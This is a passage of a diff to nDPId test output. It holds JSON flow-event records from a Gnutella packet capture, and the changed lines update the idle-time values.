+00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":87670,"flow_last_seen":96685,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"99.199.148.6","src_port":50280,"dst_port":4338,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":87670,"flow_last_seen":96685,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"99.199.148.6","src_port":50280,"dst_port":4338,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":72852,"flow_last_seen":551890,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"91.175.220.161","src_port":28681,"dst_port":15721,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":72852,"flow_last_seen":551890,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"91.175.220.161","src_port":28681,"dst_port":15721,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":82059,"flow_last_seen":493285,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"93.29.107.176","src_port":28681,"dst_port":20363,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":82059,"flow_last_seen":493285,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"93.29.107.176","src_port":28681,"dst_port":20363,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00580{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":82060,"flow_last_seen":493286,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"196.217.132.111","src_port":28681,"dst_port":25394,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00565{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":82060,"flow_last_seen":493286,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"196.217.132.111","src_port":28681,"dst_port":25394,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":85608,"flow_last_seen":94638,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"122.117.100.78","src_port":50275,"dst_port":9010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":85608,"flow_last_seen":94638,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"122.117.100.78","src_port":50275,"dst_port":9010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":85608,"flow_last_seen":94638,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"122.117.100.78","src_port":50275,"dst_port":9010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":85608,"flow_last_seen":94638,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"122.117.100.78","src_port":50275,"dst_port":9010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":493286,"flow_last_seen":493286,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.38.9.82","src_port":28681,"dst_port":24223,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":493286,"flow_last_seen":493286,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.38.9.82","src_port":28681,"dst_port":24223,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":781,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":490660,"flow_last_seen":552092,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"112.105.52.2","src_port":28681,"dst_port":23458,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -4135,18 +4135,18 @@ 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":253025,"flow_last_seen":553212,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.68.45.203","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":82062,"flow_last_seen":491980,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.132.196.58","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":82062,"flow_last_seen":491980,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.132.196.58","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":63002,"flow_last_seen":72031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.128.217.128","src_port":50200,"dst_port":45194,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":63002,"flow_last_seen":72031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.128.217.128","src_port":50200,"dst_port":45194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":63002,"flow_last_seen":72031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.128.217.128","src_port":50200,"dst_port":45194,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":63002,"flow_last_seen":72031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.128.217.128","src_port":50200,"dst_port":45194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":769,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490659,"flow_last_seen":551881,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.110.61.169","src_port":28681,"dst_port":11973,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":769,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490659,"flow_last_seen":551881,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.110.61.169","src_port":28681,"dst_port":11973,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":65063,"flow_last_seen":74092,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.117.153.7","src_port":50213,"dst_port":50138,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":65063,"flow_last_seen":74092,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.117.153.7","src_port":50213,"dst_port":50138,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":65063,"flow_last_seen":74092,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.117.153.7","src_port":50213,"dst_port":50138,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":65063,"flow_last_seen":74092,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.117.153.7","src_port":50213,"dst_port":50138,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":431830,"flow_last_seen":431830,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.75.43.182","src_port":28681,"dst_port":43502,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":431830,"flow_last_seen":431830,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.75.43.182","src_port":28681,"dst_port":43502,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70171,"flow_last_seen":79201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.18.172.208","src_port":50241,"dst_port":63172,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70171,"flow_last_seen":79201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.18.172.208","src_port":50241,"dst_port":63172,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90747,"flow_last_seen":99778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"213.229.111.224","src_port":50321,"dst_port":4876,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90747,"flow_last_seen":99778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"213.229.111.224","src_port":50321,"dst_port":4876,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70171,"flow_last_seen":79201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.18.172.208","src_port":50241,"dst_port":63172,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70171,"flow_last_seen":79201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.18.172.208","src_port":50241,"dst_port":63172,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90747,"flow_last_seen":99778,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"213.229.111.224","src_port":50321,"dst_port":4876,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90747,"flow_last_seen":99778,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"213.229.111.224","src_port":50321,"dst_port":4876,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":775,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490660,"flow_last_seen":490939,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"223.17.132.18","src_port":28681,"dst_port":23458,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":775,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490660,"flow_last_seen":490939,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"223.17.132.18","src_port":28681,"dst_port":23458,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":72851,"flow_last_seen":553212,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"119.224.95.97","src_port":28681,"dst_port":46356,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -4155,28 +4155,28 @@ 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":72850,"flow_last_seen":551891,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.138.50.179","src_port":28681,"dst_port":29411,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":493287,"flow_last_seen":493287,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"220.134.167.82","src_port":28681,"dst_port":5820,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":493287,"flow_last_seen":493287,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"220.134.167.82","src_port":28681,"dst_port":5820,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70170,"flow_last_seen":79200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.218.41.253","src_port":50238,"dst_port":59144,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70170,"flow_last_seen":79200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.218.41.253","src_port":50238,"dst_port":59144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":86639,"flow_last_seen":95653,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.246.156.126","src_port":50276,"dst_port":56070,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
